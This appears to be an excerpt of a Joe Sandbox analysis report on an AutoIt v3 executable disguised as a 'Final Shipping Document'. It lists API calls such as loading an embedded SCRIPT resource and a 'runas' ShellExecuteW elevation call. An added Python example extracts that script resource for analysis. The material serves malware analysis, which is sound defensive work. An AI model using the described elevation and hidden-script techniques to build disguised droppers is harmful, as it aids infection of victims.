bbcec9 99932->99934 99934->99921 99936 ba6270 22 API calls 99935->99936 99937 bbcfc9 99936->99937 99938 ba9cb3 22 API calls 99937->99938 
[Execution graph: flattened node/edge list not reproduced. Win32 APIs named in the omitted edges: window and tray handling (CreateWindowExW, ShowWindow, DefWindowProcW, PostQuitMessage, SetTimer, KillTimer, RegisterWindowMessageW, CreatePopupMenu, MoveWindow, SetFocus, DestroyWindow, DeleteObject, DestroyIcon, LoadStringW, Shell_NotifyIconW, SystemParametersInfoW); message pump (PeekMessageW, GetInputState, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, IsDialogMessageW, GetClassLongW, GetForegroundWindow); process, synchronisation and timing (GetStdHandle, OleInitialize, InitializeCriticalSectionAndSpinCount, InterlockedExchange, GetCurrentProcess, DuplicateHandle, CreateThread, CloseHandle, GetExitCodeProcess, WaitForSingleObject, Sleep, timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, EnterCriticalSection, LeaveCriticalSection, SetEvent, ResetEvent); shell and file I/O (ShellExecuteW, SetCurrentDirectoryW, GetOpenFileNameW, GetLongPathNameW, CreateFileW, GetFileType, GetLastError).]

Control-flow Graph

Basic-block graph of the function at 00BA42DE (blocks 00BA42DE-00BA44A6 and 00BE3617-00BE3828); the executed/not-executed colouring and the edge list are not reproduced here.
APIs
• GetVersionExW.KERNEL32(?), ref: 00BA430D
  • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
• GetCurrentProcess.KERNEL32(?,00C3CB64,00000000,?,?), ref: 00BA4422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00BA4429
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00BA4454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BA4466
• GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00BA4474
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00BA447B
• GetSystemInfo.KERNEL32(?,?,?), ref: 00BA44A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 645464ad87388bf772f681e67cad357595e00f5eb0fdddfb93dd3d8095b5c009
• Instruction ID: 5a827c6c20eeb1e3bf1b46455a2c64685be6b4cee80763da5124aa17cc3f121c
• Opcode Fuzzy Hash: 645464ad87388bf772f681e67cad357595e00f5eb0fdddfb93dd3d8095b5c009
• Instruction Fuzzy Hash: 33A1AF7691E2C0CFCB11CB6D688679D7EE4AB67700B0C48D9E88D97B72D7604A84CB21

Control-flow Graph

Basic-block graph of the function at 00BA42A2 (blocks 00BA42A2-00BA42DD and 00BE35BA-00BE3612); the executed/not-executed colouring and the edge list are not reproduced here.
APIs
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BA50AA,?,?,00000000,00000000), ref: 00BA42B2
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BA50AA,?,?,00000000,00000000), ref: 00BA42C9
• LoadResource.KERNEL32(?,00000000,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20), ref: 00BE35BE
• SizeofResource.KERNEL32(?,00000000,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20), ref: 00BE35D3
• LockResource.KERNEL32(00BA50AA,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20,?), ref: 00BE35E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: 5f6c4f637b9f840993261accb0167effb3a53e39a22e77ae0e67e074ea5dd6bb
• Instruction ID: a6dd6a417527cd41f70e930dbdcfcad3f3c5ec40e13291b6ccc8d200e9fce0c5
• Opcode Fuzzy Hash: 5f6c4f637b9f840993261accb0167effb3a53e39a22e77ae0e67e074ea5dd6bb
• Instruction Fuzzy Hash: 44118E71250700BFDB258B65DC88F2B7BF9EBC6B51F1081A9F412E6290DBB1DC048720
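The call sequence in this function (CreateStreamOnHGlobal, then FindResourceExW with lpType 0x0A and lpName "SCRIPT", LoadResource, SizeofResource, LockResource) is how the AutoIt3 runtime inside this binary fetches its compiled script: the script sits in an RT_RCDATA (type 10) resource named SCRIPT. The code below is an added example, not code from the report or from AutoIt, that walks a PE resource directory offline to pull that blob out. It takes the raw .rsrc section and that section's VirtualAddress as input (read them from the section table, or with pefile via a section's VirtualAddress and get_data()). The build_sample_rsrc helper constructs a synthetic .rsrc section for demonstration, and the AU3!EA06 marker check is an assumed heuristic for AutoIt3 script blobs; the report itself does not show the resource contents.

```python
import struct

RT_RCDATA = 10           # lpType 0x0A in the FindResourceExW call at 00BA42C9
SCRIPT_NAME = "SCRIPT"   # lpName in the same call
AU3_MAGIC = b"AU3!EA06"  # assumed marker of AutoIt3 script blobs; not shown in this report


def _read_dir_entries(rsrc, dir_off):
    """Yield (ident, is_name, target, is_subdir) for each entry of the IMAGE_RESOURCE_DIRECTORY
    at dir_off. All offsets are relative to the start of the .rsrc section."""
    if dir_off + 16 > len(rsrc):
        raise ValueError("resource directory at 0x%x runs past .rsrc" % dir_off)
    n_named, n_ids = struct.unpack_from("<HH", rsrc, dir_off + 12)
    pos = dir_off + 16
    for _ in range(n_named + n_ids):
        if pos + 8 > len(rsrc):
            raise ValueError("resource entry at 0x%x runs past .rsrc" % pos)
        name, data = struct.unpack_from("<II", rsrc, pos)
        # High bit of Name: entry is named (offset to a DIR_STRING_U); high bit of OffsetToData: subdirectory.
        yield (name & 0x7FFFFFFF, bool(name & 0x80000000),
               data & 0x7FFFFFFF, bool(data & 0x80000000))
        pos += 8


def _read_dir_string(rsrc, off):
    """Decode IMAGE_RESOURCE_DIR_STRING_U: u16 character count followed by UTF-16LE characters."""
    (count,) = struct.unpack_from("<H", rsrc, off)
    end = off + 2 + 2 * count
    if end > len(rsrc):
        raise ValueError("resource name at 0x%x runs past .rsrc" % off)
    return rsrc[off + 2:end].decode("utf-16-le")


def _lookup(rsrc, dir_off, key):
    """Find the entry whose id (int key) or name (str key) matches; return (target, is_subdir) or None."""
    for ident, is_name, target, is_subdir in _read_dir_entries(rsrc, dir_off):
        if is_name and isinstance(key, str) and _read_dir_string(rsrc, ident) == key:
            return target, is_subdir
        if not is_name and isinstance(key, int) and ident == key:
            return target, is_subdir
    return None


def extract_resource(rsrc, rsrc_rva, type_key, name_key):
    """Return the bytes of resource type_key/name_key (first language entry), or None if absent.
    rsrc is the raw .rsrc section; rsrc_rva is that section's VirtualAddress."""
    hit = _lookup(rsrc, 0, type_key)               # level 1: resource type
    if hit is None or not hit[1]:
        return None
    hit = _lookup(rsrc, hit[0], name_key)          # level 2: resource name or id
    if hit is None or not hit[1]:
        return None
    langs = list(_read_dir_entries(rsrc, hit[0]))  # level 3: language; take the first one
    if not langs or langs[0][3]:
        return None
    data_off = langs[0][2]
    if data_off + 16 > len(rsrc):
        raise ValueError("resource data entry at 0x%x runs past .rsrc" % data_off)
    data_rva, size = struct.unpack_from("<II", rsrc, data_off)  # IMAGE_RESOURCE_DATA_ENTRY
    start = data_rva - rsrc_rva
    if start < 0 or start + size > len(rsrc):
        raise ValueError("resource data RVA 0x%x lies outside .rsrc" % data_rva)
    return rsrc[start:start + size]


def looks_like_au3_script(blob):
    """Heuristic (assumed): AutoIt3 script blobs carry the AU3!EA06 marker near their start."""
    return AU3_MAGIC in blob[:64]


def build_sample_rsrc(rsrc_rva, payload):
    """Constructed .rsrc section for testing: root -> RT_RCDATA -> "SCRIPT" -> lang 0x409 -> payload.
    Fixed layout: directories at 0x00/0x18/0x30, data entry at 0x48, name string at 0x58, payload at 0x68."""
    root = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", RT_RCDATA, 0x80000000 | 0x18)
    type_dir = struct.pack("<IIHHHH", 0, 0, 0, 0, 1, 0) + struct.pack("<II", 0x80000000 | 0x58, 0x80000000 | 0x30)
    name_dir = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", 0x409, 0x48)
    data_entry = struct.pack("<IIII", rsrc_rva + 0x68, len(payload), 0, 0)
    name_str = struct.pack("<H", len(SCRIPT_NAME)) + SCRIPT_NAME.encode("utf-16-le")
    header = root + type_dir + name_dir + data_entry + name_str
    return header + b"\0" * (0x68 - len(header)) + payload


if __name__ == "__main__":
    sample = build_sample_rsrc(0x1C000, b"\0" * 16 + AU3_MAGIC + b"<constructed script body>")
    script = extract_resource(sample, 0x1C000, RT_RCDATA, SCRIPT_NAME)
    print(len(script), "bytes;", "AU3 marker present" if looks_like_au3_script(script) else "no marker")
```

On a real sample, feed extract_resource the .rsrc section bytes and VirtualAddress from the section table; the returned blob is what the runtime hands to CreateStreamOnHGlobal, and the bounds checks matter because a packed or tampered resource tree can point outside the section.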

Control-flow Graph

APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 00BA2B6B
  • Part of subcall function 00BA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C71418,?,00BA2E7F,?,?,?,00000000), ref: 00BA3A78
  • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,00C62224), ref: 00BE2C10
• ShellExecuteW.SHELL32(00000000,?,?,00C62224), ref: 00BE2C17
Strings
Memory Dump Source
• Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
• Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
Similarity
• API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
• String ID: runas
• API String ID: 448630720-4000483414
• Opcode ID: 4f53dcd8b7b9e7630a0d38c92ba75189e7f61be491dfdb70a3dd716b452c4e5c
• Instruction ID: da9943d95218873ea81f685ee95af72df766417e60de403edff8d5f47a53db72
• Opcode Fuzzy Hash: 4f53dcd8b7b9e7630a0d38c92ba75189e7f61be491dfdb70a3dd716b452c4e5c
• Instruction Fuzzy Hash: 8E11D63110C3415BCB14FF68D891ABE77E4DB93750F4854ADF586520A2DF21894A9712
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00BE5222), ref: 00C0DBCE
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00C0DBDD
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00C0DBEE
                                                            • FindClose.KERNEL32(00000000), ref: 00C0DBFA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                            • String ID:
                                                            • API String ID: 2695905019-0
                                                            • Opcode ID: aa34bcdc64dc46a3e0b6d0a38e49bf4ebf163754b71cfac8dbf0e209ae7e63b6
                                                            • Instruction ID: fe24c1004dd8a196e86a7f776994fada3b88bdc3eb72679568397f8a9043aff6
                                                            • Opcode Fuzzy Hash: aa34bcdc64dc46a3e0b6d0a38e49bf4ebf163754b71cfac8dbf0e209ae7e63b6
                                                            • Instruction Fuzzy Hash: F2F0A03182092057D3206BB8AC4DAAF3B6C9E01334B104702F836D20F0EBB15A54CA95
                                                            APIs
                                                            • GetInputState.USER32 ref: 00BAD807
                                                            • timeGetTime.WINMM ref: 00BADA07
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BADB28
                                                            • TranslateMessage.USER32(?), ref: 00BADB7B
                                                            • DispatchMessageW.USER32(?), ref: 00BADB89
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BADB9F
                                                            • Sleep.KERNEL32(0000000A), ref: 00BADBB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                            • String ID:
                                                            • API String ID: 2189390790-0
                                                            • Opcode ID: 4d633c1a249b004e905098568b870dcf08638db304f1647e891833d6de5a7194
                                                            • Instruction ID: 0e159acf8913b425c1f7fcddb3605f0f61d277c70c8426d6c6fb1c317c2febd5
                                                            • Opcode Fuzzy Hash: 4d633c1a249b004e905098568b870dcf08638db304f1647e891833d6de5a7194
                                                            • Instruction Fuzzy Hash: 0642D270608245EFD724CF24C885BBEB7E0FF46314F548A99E956876A1D770E888CB92

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00BA2D07
                                                            • RegisterClassExW.USER32(00000030), ref: 00BA2D31
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA2D42
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00BA2D5F
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA2D6F
                                                            • LoadIconW.USER32(000000A9), ref: 00BA2D85
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA2D94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 89dff7ec86aa9627b16f3e70ca84627a8e5f26b2b299b929abc9c2d3c388d880
                                                            • Instruction ID: 1db19bc23099b8cbce6645c38330fe09e18854f7c3ef2235aeac71814e8b2a6f
                                                            • Opcode Fuzzy Hash: 89dff7ec86aa9627b16f3e70ca84627a8e5f26b2b299b929abc9c2d3c388d880
                                                            • Instruction Fuzzy Hash: A621C4B5921319AFDB00DFA8EC89BDDBBB4FB08700F04411AFA15B62A0D7B54584CFA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 302 be065b-be068b call be042f 305 be068d-be0698 call bcf2c6 302->305 306 be06a6-be06b2 call bd5221 302->306 313 be069a-be06a1 call bcf2d9 305->313 311 be06cb-be0714 call be039a 306->311 312 be06b4-be06c9 call bcf2c6 call bcf2d9 306->312 321 be0716-be071f 311->321 322 be0781-be078a GetFileType 311->322 312->313 323 be097d-be0983 313->323 327 be0756-be077c GetLastError call bcf2a3 321->327 328 be0721-be0725 321->328 324 be078c-be07bd GetLastError call bcf2a3 CloseHandle 322->324 325 be07d3-be07d6 322->325 324->313 339 be07c3-be07ce call bcf2d9 324->339 330 be07df-be07e5 325->330 331 be07d8-be07dd 325->331 327->313 328->327 332 be0727-be0754 call be039a 328->332 336 be07e9-be0837 call bd516a 330->336 337 be07e7 330->337 331->336 332->322 332->327 345 be0839-be0845 call be05ab 336->345 346 be0847-be086b call be014d 336->346 337->336 339->313 345->346 351 be086f-be0879 call bd86ae 345->351 352 be087e-be08c1 346->352 353 be086d 346->353 351->323 355 be08e2-be08f0 352->355 356 be08c3-be08c7 352->356 353->351 359 be097b 355->359 360 be08f6-be08fa 355->360 356->355 358 be08c9-be08dd 356->358 358->355 359->323 360->359 361 be08fc-be092f CloseHandle call be039a 360->361 364 be0963-be0977 361->364 365 be0931-be095d GetLastError call bcf2a3 call bd5333 361->365 364->359 365->364
                                                            APIs
                                                              • Part of subcall function 00BE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00BE0704,?,?,00000000,?,00BE0704,00000000,0000000C), ref: 00BE03B7
                                                            • GetLastError.KERNEL32 ref: 00BE076F
                                                            • __dosmaperr.LIBCMT ref: 00BE0776
                                                            • GetFileType.KERNELBASE(00000000), ref: 00BE0782
                                                            • GetLastError.KERNEL32 ref: 00BE078C
                                                            • __dosmaperr.LIBCMT ref: 00BE0795
                                                            • CloseHandle.KERNEL32(00000000), ref: 00BE07B5
                                                            • CloseHandle.KERNEL32(?), ref: 00BE08FF
                                                            • GetLastError.KERNEL32 ref: 00BE0931
                                                            • __dosmaperr.LIBCMT ref: 00BE0938
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                            • String ID: H
                                                            • API String ID: 4237864984-2852464175
                                                            • Opcode ID: 371a11f128b02b2610d3055cb4f15cae8445f60cf40bc5c86177501ac23e539f
                                                            • Instruction ID: dd7f728e3958d2194c2cc81d58a96596140589a5693ad5fa8f40b78accd84a3f
                                                            • Opcode Fuzzy Hash: 371a11f128b02b2610d3055cb4f15cae8445f60cf40bc5c86177501ac23e539f
                                                            • Instruction Fuzzy Hash: 58A12732A241858FDF19AF68D891BAD7BE1EB06320F24019DF815AF391D7719C52CB91

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00BA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C71418,?,00BA2E7F,?,?,?,00000000), ref: 00BA3A78
                                                              • Part of subcall function 00BA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BA3379
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BA356A
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BE318D
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BE31CE
                                                            • RegCloseKey.ADVAPI32(?), ref: 00BE3210
                                                            • _wcslen.LIBCMT ref: 00BE3277
                                                            • _wcslen.LIBCMT ref: 00BE3286
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 98802146-2727554177
                                                            • Opcode ID: 40ca2c43fab6c4d690588c6cc10d2a9e7043fd14ee00cbf494ecdd7975d3ec9b
                                                            • Instruction ID: 1cb656bf6837cd50c13a6efe6eb9a0c68239e14e2f39c544110a232966deea75
                                                            • Opcode Fuzzy Hash: 40ca2c43fab6c4d690588c6cc10d2a9e7043fd14ee00cbf494ecdd7975d3ec9b
                                                            • Instruction Fuzzy Hash: C3716C714083019EC714DF65DC86AAFBBE8FF85740F40486EF589971B0EB749A88CB62

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00BA2B8E
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00BA2B9D
                                                            • LoadIconW.USER32(00000063), ref: 00BA2BB3
                                                            • LoadIconW.USER32(000000A4), ref: 00BA2BC5
                                                            • LoadIconW.USER32(000000A2), ref: 00BA2BD7
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BA2BEF
                                                            • RegisterClassExW.USER32(?), ref: 00BA2C40
                                                              • Part of subcall function 00BA2CD4: GetSysColorBrush.USER32(0000000F), ref: 00BA2D07
                                                              • Part of subcall function 00BA2CD4: RegisterClassExW.USER32(00000030), ref: 00BA2D31
                                                              • Part of subcall function 00BA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA2D42
                                                              • Part of subcall function 00BA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00BA2D5F
                                                              • Part of subcall function 00BA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA2D6F
                                                              • Part of subcall function 00BA2CD4: LoadIconW.USER32(000000A9), ref: 00BA2D85
                                                              • Part of subcall function 00BA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA2D94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 13d06ffe798a7e246abf685aada5fb68d022afb327a9cc8f1e60060a6e5428c0
                                                            • Instruction ID: b9479b51329311dbee1999ce43af53599c62661c670dfda503b6c095f151123f
                                                            • Opcode Fuzzy Hash: 13d06ffe798a7e246abf685aada5fb68d022afb327a9cc8f1e60060a6e5428c0
                                                            • Instruction Fuzzy Hash: FC212C75E10314ABDB109FA9EC95BAD7FB8FB48B50F08405AFA08B66B0D7B14584CF90

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 443 ba3170-ba3185 444 ba3187-ba318a 443->444 445 ba31e5-ba31e7 443->445 447 ba31eb 444->447 448 ba318c-ba3193 444->448 445->444 446 ba31e9 445->446 449 ba31d0-ba31d8 DefWindowProcW 446->449 450 be2dfb-be2e23 call ba18e2 call bbe499 447->450 451 ba31f1-ba31f6 447->451 452 ba3199-ba319e 448->452 453 ba3265-ba326d PostQuitMessage 448->453 456 ba31de-ba31e4 449->456 486 be2e28-be2e2f 450->486 458 ba31f8-ba31fb 451->458 459 ba321d-ba3244 SetTimer RegisterWindowMessageW 451->459 454 be2e7c-be2e90 call c0bf30 452->454 455 ba31a4-ba31a8 452->455 457 ba3219-ba321b 453->457 454->457 480 be2e96 454->480 462 ba31ae-ba31b3 455->462 463 be2e68-be2e77 call c0c161 455->463 457->456 466 be2d9c-be2d9f 458->466 467 ba3201-ba3214 KillTimer call ba30f2 call ba3c50 458->467 459->457 464 ba3246-ba3251 CreatePopupMenu 459->464 469 be2e4d-be2e54 462->469 470 ba31b9-ba31be 462->470 463->457 464->457 472 be2dd7-be2df6 MoveWindow 466->472 473 be2da1-be2da5 466->473 467->457 469->449 483 be2e5a-be2e63 call c00ad7 469->483 478 ba3253-ba3263 call ba326f 470->478 479 ba31c4-ba31ca 470->479 472->457 481 be2dc6-be2dd2 SetFocus 473->481 482 be2da7-be2daa 473->482 478->457 479->449 479->486 480->449 481->457 482->479 487 be2db0-be2dc1 call ba18e2 482->487 483->449 486->449 491 be2e35-be2e48 call ba30f2 call ba3837 486->491 487->457 491->449
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BA316A,?,?), ref: 00BA31D8
                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00BA316A,?,?), ref: 00BA3204
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BA3227
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BA316A,?,?), ref: 00BA3232
                                                            • CreatePopupMenu.USER32 ref: 00BA3246
                                                            • PostQuitMessage.USER32(00000000), ref: 00BA3267
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
